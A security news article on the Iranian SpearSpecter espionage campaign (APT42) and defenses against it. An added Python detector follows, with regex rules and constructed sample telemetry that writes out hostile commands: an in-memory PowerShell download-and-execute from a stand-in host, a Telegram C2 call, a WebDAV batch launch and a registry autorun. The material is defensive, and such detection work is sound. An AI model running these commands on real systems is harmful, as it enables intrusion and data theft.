Iranian Hackers Use SpearSpecter to Target Senior Government Leaders

An Iranian campaign called SpearSpecter is quietly targeting senior officials with tailored social engineering and fileless malware.

Ken Underhill
Nov 17, 2025

A sophisticated Iranian cyber-espionage operation, known as SpearSpecter, is actively targeting senior government, military, and defense officials across the globe. 

The campaign is attributed to operators within Iran’s Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), an activity cluster also referred to as APT42 or CharmingCypress. 

Researchers from the Israel National Digital Agency (INDA) uncovered the ongoing operation and its associated malware tools, revealing a threat actor that blends patient social engineering with advanced technical capabilities to infiltrate high-value targets.

The Human Manipulation Behind the Campaign

SpearSpecter relies heavily on social engineering as its initial infiltration method. Attackers initiate contact through WhatsApp using persuasive pretexts such as fake conference invitations, meeting requests, or event participation. 

These communications often appear convincing because the operators invest weeks in rapport-building before delivering a malicious link. 

To widen their opportunities for compromise, APT42 has also been observed targeting victims’ family members, leveraging personal relationships to increase the likelihood of successful engagement.

How the Infection Chain Unfolds

Once sufficient trust is established, the victim receives a link to what appears to be an important document hosted on OneDrive. 

Clicking the link triggers exploitation of the Windows search-ms protocol, which prompts users to open Windows Explorer. If permitted, the system automatically connects to an attacker-controlled WebDAV server.

This WebDAV share presents a fake PDF file that is actually a malicious shortcut (LNK). When opened, it silently downloads and executes a batch script from Cloudflare Workers. 

This script loads TAMECAT, a modular PowerShell-based backdoor designed to operate exclusively in memory. 

TAMECAT communicates via multiple encrypted channels — including web traffic, Telegram, and Discord — and exfiltrates browser credentials, captures screenshots, enumerates documents, and uploads data in encrypted 5 MB segments. 

To maintain persistence, TAMECAT creates registry-based autoruns while blending into legitimate Windows processes to reduce detection.

A Persistent and Evolving Espionage Campaign

INDA’s investigation suggests that SpearSpecter has been active for months and shows no signs of slowing. 

The campaign’s reliance on fileless malware, legitimate cloud infrastructure, and personalized social engineering indicates a highly adaptive threat actor. 

These findings align with APT42’s known mission: long-term intelligence collection on individuals with access to sensitive or strategic information.

Key Defenses Against SpearSpecter Threats

Defending against the SpearSpecter campaign requires combining strong technical controls with heightened organizational awareness to counter APT42’s blend of social engineering, fileless malware, and trusted-service abuse.

  • Enable strong visibility and monitoring by using PowerShell script block logging, Sysmon with SIEM forwarding, robust EDR coverage, behavioral rules aligned to APT42 TTPs, and retroactive IOC hunts for high-risk environments.
  • Increase employee awareness by training staff on APT42’s realistic social engineering tactics and requiring verification of unexpected invitations, meeting requests, or document links through trusted internal contacts.
  • Disable the search-ms protocol by removing its registry keys to prevent remote file-browsing malware delivery and block this increasingly abused attack vector.
  • Improve network monitoring and filtering by establishing traffic baselines, alerting on deviations, and using proxies with packet inspection to detect suspicious patterns or connections to services like Telegram or Discord.
  • Harden endpoints by enabling PowerShell Constrained Language Mode, AMSI, and Script Block Logging, and restricting unapproved binaries, scripts, and LNK files using privilege management tools.
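
The following is an added example, not code from the article or from INDA, showing what "behavioral rules aligned to APT42 TTPs" over Sysmon and PowerShell script block logs can look like for the infection chain described above (search-ms handler opening Explorer against a remote location, Explorer launching a shell from a WebDAV path, an in-memory PowerShell loader, chat-service C2, and a registry autorun). The event records and every hostname, path and URL in them are constructed; the record shape is a simplified stand-in for Sysmon event 1 and PowerShell event 4104, and the Telegram and Discord API hostnames are assumed indicators, not IOCs from the report.

```python
"""Behavioural detection for a SpearSpecter-style infection chain (added example)."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str            # "process" (Sysmon event 1) or "scriptblock" (PowerShell 4104)
    host: str
    image: str = ""      # process image path
    parent: str = ""     # parent image path
    cmdline: str = ""    # full command line
    text: str = ""       # script block text (4104 only)


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


# Stage 1: search-ms URI whose crumb points at a remote (UNC) location.
SEARCH_MS_REMOTE = re.compile(r"search-ms:.*crumb=location:\\\\", re.I)
# Stage 2: Windows WebDAV redirector path forms (\\host@SSL@port\... or DavWWWRoot).
WEBDAV_PATH = re.compile(r"\\\\[^\\\s]+@SSL|DavWWWRoot", re.I)
REMOTE_FETCH = re.compile(r"https?://\S+", re.I)
# Stage 3: download-and-execute in memory, or an encoded command.
INMEM_LOADER = re.compile(
    r"(Invoke-Expression|\bIEX\b).*(DownloadString|Invoke-WebRequest|Net\.WebClient)"
    r"|(DownloadString|Invoke-WebRequest|Net\.WebClient).*(Invoke-Expression|\bIEX\b)"
    r"|-EncodedCommand|-enc\b", re.I | re.S)
# Chat-service C2 endpoints (assumed indicators for this example).
C2_CHANNELS = re.compile(r"api\.telegram\.org|discord\.com/api/webhooks", re.I)
# Stage 4: registry-based autorun for persistence.
AUTORUN_KEY = re.compile(r"CurrentVersion\\Run\b", re.I)
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list) -> list:
    """Apply the per-stage rules and return one Finding per matching event/rule."""
    findings = []
    for e in events:
        if e.kind == "process":
            img, parent = _basename(e.image), _basename(e.parent)
            if img == "explorer.exe" and SEARCH_MS_REMOTE.search(e.cmdline):
                findings.append(Finding("search-ms-remote", e.host, e.cmdline))
            if parent == "explorer.exe" and img in SHELLS and (
                    WEBDAV_PATH.search(e.cmdline) or REMOTE_FETCH.search(e.cmdline)):
                findings.append(Finding("explorer-shell-webdav", e.host, e.cmdline))
            if img in SHELLS + ("reg.exe",) and AUTORUN_KEY.search(e.cmdline):
                findings.append(Finding("registry-autorun", e.host, e.cmdline))
        elif e.kind == "scriptblock":
            if INMEM_LOADER.search(e.text):
                findings.append(Finding("ps-inmemory-loader", e.host, e.text[:80]))
            if C2_CHANNELS.search(e.text):
                findings.append(Finding("ps-chat-c2", e.host, e.text[:80]))
    return findings


def chain_score(findings: list, host: str) -> int:
    """Number of distinct chain stages seen on one host; several together is the signal."""
    return len({f.rule for f in findings if f.host == host})


# Constructed sample telemetry: ws01 shows the full chain, ws02 is benign activity.
SAMPLE_EVENTS = [
    Event("process", "ws01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\svchost.exe",
          r'"C:\Windows\explorer.exe" "search-ms:query=report&crumb=location:\\webdav.example.net@SSL@443\DavWWWRoot\docs&displayname=OneDrive"'),
    Event("process", "ws01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
          r"cmd.exe /c \\webdav.example.net@SSL@443\DavWWWRoot\docs\stage.bat"),
    Event("scriptblock", "ws01",
          text="IEX (New-Object Net.WebClient).DownloadString('https://loader.example.workers.dev/t')"),
    Event("scriptblock", "ws01",
          text='Invoke-RestMethod -Uri "https://api.telegram.org/botPLACEHOLDER/getUpdates"'),
    Event("process", "ws01", r"C:\Windows\System32\reg.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\u\AppData\Local\u.bat"),
    Event("process", "ws02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe",
          r"C:\Windows\explorer.exe"),
    Event("process", "ws02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
          r"cmd.exe /c dir C:\tmp"),
    Event("scriptblock", "ws02", text="Get-ChildItem C:\\Users"),
]


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.host} {f.rule}: {f.detail}")
    print("ws01 stages:", chain_score(found, "ws01"), "ws02 stages:", chain_score(found, "ws02"))
```

Each rule on its own is noisy in a large estate (Explorer spawning cmd.exe is common); the useful alert is `chain_score` reaching several distinct stages on one host within a short window, which is why the rules emit per-stage findings rather than a single verdict. Real Sysmon and 4104 records would be mapped into `Event` from the XML or SIEM fields before calling `detect`.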

Together, these measures help organizations build cyber resilience to combat emerging threats.

The SpearSpecter campaign shows APT42’s ability to blend strategic social engineering with a sophisticated PowerShell-based malware toolkit to penetrate high-value targets. 

The operation’s evolving infrastructure, stealthy infection chain, and long-term espionage focus underscore its role in Iran’s broader intelligence apparatus.  

This level of stealth and persistence underscores the need for zero-trust principles that assume breach and verify every access path.
